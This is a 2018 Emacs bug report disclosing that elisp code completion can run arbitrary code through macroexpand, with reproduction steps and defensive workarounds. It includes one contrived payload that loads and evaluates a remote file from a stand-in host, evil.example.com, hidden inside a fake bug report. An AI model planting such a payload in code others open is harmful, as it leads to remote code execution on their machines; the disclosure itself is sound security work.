[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
bug#32495: 26.1; Arbitrary code execution when completing inside untrust
From: |
Wilfred Hughes |
Subject: |
bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code |
Date: |
Wed, 22 Aug 2018 01:11:55 +0100 |
elisp-completion-at-point calls macroexpand, which may execute arbitrary code.
REPRODUCING
1. Insert this code in a buffer in emacs-lisp-mode.
(let ((foo (eval-when-compile (debug))))
x)
2. Put point on x.
3. Press C-M-i, or M-x elisp-completion-at-point.
4. Observe that the debugger is opened, because code is being executed!
SEVERITY
I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:
(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
;; ... lots of code
(bar 1))
;; Dear maintainer, I've found a bug in your completion. Please try
;; completion in the following:
abc
)
This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.
WORKAROUNDS
When calling macroexpand or macroexpand-all, either:
1. pass in an environment with all untrusted macros replaced with dummies:
(let ((macro-whitelist '(when pcase))
all-macros
safe-env)
(mapatoms
(lambda (sym)
(when (macrop sym)
(push sym all-macros))))
(mapc
(lambda (sym)
(unless (memq sym macro-whitelist)
(push (cons sym (symbol-function 'ignore))
safe-env)))
all-macros)
(macroexpand-all
arbitrary-form-here
safe-env))
2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):
(cl-letf (((symbol-function 'eval) #'ignore)
((symbol-function 'eval-region) #'ignore)
((symbol-function 'eval-buffer) #'ignore)
((symbol-function 'backtrace-eval) #'ignore))
(macroexpand-all some-arbitrary-form-here))
- bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code,
Wilfred Hughes <=